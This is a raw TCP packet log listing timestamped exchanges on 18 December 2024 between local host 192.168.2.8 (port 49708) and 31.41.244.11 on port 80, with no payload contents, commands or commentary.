Dec 18, 2024 13:38:11.848556042 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.848599911 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.850750923 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.850806952 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.850965977 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.851011038 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.853133917 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.853184938 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.853202105 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.853249073 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.855598927 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.855652094 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.855719090 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.855772972 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.857892990 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.857914925 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.857945919 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.857969046 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.860269070 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.860317945 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.860472918 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.860517979 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.862575054 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.862683058 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.862735987 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.864453077 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.864583969 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.864634037 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.866651058 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.866699934 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.866704941 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.866751909 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.868686914 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.868736982 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.868910074 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.868952990 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.870928049 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.870979071 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.870994091 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.871020079 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.872966051 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.872980118 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.873028040 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.873049974 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.874949932 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.875014067 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.875176907 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.875222921 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.876915932 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.876991034 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.877024889 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.877065897 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.878952980 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.878998041 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.879051924 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.879095078 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.880987883 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.881000996 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.881042004 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.882900953 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.882949114 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.882981062 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.883018970 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.884918928 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.884967089 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.885016918 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.885065079 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.886790037 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.886843920 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.886996031 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.887044907 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.888972044 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.888983965 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.889023066 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.889040947 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.890636921 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.890688896 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.890748978 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.890796900 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.892524958 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.892577887 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.892849922 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.892925024 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.894398928 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.894455910 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.894550085 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.894594908 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.896420002 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.896433115 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.896483898 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.896506071 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.898303032 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.898359060 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.898391008 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.898437023 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.899981022 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.900036097 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.900110960 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.900156021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.901771069 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.901823044 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.901886940 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.901933908 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.903738022 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.903759003 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.903794050 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.903819084 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.905575991 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.905589104 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.905626059 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.905642033 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.907299995 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.907351017 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.907491922 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.907533884 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.909204960 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.909260988 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.909404993 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.909461021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.911014080 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.911071062 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.911283016 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.911329985 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.912944078 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.912990093 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.913079977 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.913127899 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.914949894 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.915002108 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.915188074 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.915230989 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.916636944 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.916697025 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.916794062 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.916838884 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.918471098 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.918483973 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.918529987 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.920320034 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.920335054 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.920373917 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.922202110 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.922214985 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.922252893 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.922270060 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.924123049 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.924180031 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.924338102 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.924393892 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.925770998 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.925815105 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.925961018 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.926004887 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.927722931 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.927783966 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.927819967 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.927867889 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.929472923 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.929523945 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.929601908 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.929645061 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.931272984 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.931322098 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.931504011 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.931550026 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.933137894 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.933192968 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.933346033 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.933393955 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.935122013 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.935134888 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.935179949 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.936790943 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.936841965 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.936913967 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.936959028 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.938676119 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.938729048 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.938843012 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.938886881 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.940509081 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.940567017 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.940728903 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.940778017 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.942447901 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.942460060 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.942521095 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.944184065 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.944236994 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.944308996 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.944355011 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:11.946103096 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:11.946158886 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.037059069 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.037072897 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.037249088 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.037744045 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.037797928 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.037914991 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.037961006 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.038990974 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.039004087 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.039041042 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.040388107 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.040401936 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.040441990 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.041559935 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.041603088 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.041671991 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.041712046 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.043006897 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.043051958 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.043090105 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.043128967 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.044190884 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.044234991 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.044274092 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.044320107 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.045454979 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.045502901 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.045600891 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.045639992 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.046891928 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.046905994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.046937943 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.046960115 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.048161030 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.048173904 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.048233032 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.048254967 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.049330950 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.049391985 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.049428940 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.049503088 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.050637960 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.050699949 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.050730944 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.050781012 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.052022934 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.052083015 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.052154064 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.052191973 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.053361893 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.053411007 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.053442955 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.053478003 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.054428101 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.054486036 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.054634094 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.054686069 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.055885077 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.055907011 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.055949926 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.055967093 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.056746960 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.056834936 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.056862116 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.056919098 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.057888031 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.057931900 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.058149099 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.058192015 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.059118986 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.059159040 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.059227943 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.059268951 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.060259104 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.060301065 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.060625076 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.060667038 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.061549902 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.061562061 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.061594009 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.061613083 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.062758923 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.062819958 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.063019991 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.063075066 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.063752890 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.063796043 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.063826084 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.063865900 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.064956903 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.065001965 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.065048933 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.065090895 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.066179037 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.066190958 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.066230059 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.067327976 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.067339897 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.067383051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.068330050 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.068375111 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.068470001 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.068516016 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.069514036 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.069562912 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.069600105 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.069639921 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.070631981 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.070672035 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.070719004 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.070768118 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.071887016 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.071899891 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.071938992 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.071963072 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.072957039 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.073004961 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.073034048 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.073080063 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.074079990 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.074140072 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.074242115 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.074294090 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.075176954 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.075231075 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.075339079 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.075388908 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.076292992 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.076343060 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.076396942 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.076442003 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.077547073 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.077596903 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.077610016 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.077656031 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.078687906 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.078733921 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.078759909 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.078804016 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.079802990 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.079848051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.079914093 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.079961061 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.080928087 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.080974102 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.081015110 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.081064939 CET	49708	80	192.168.2.8	31.41.244.11
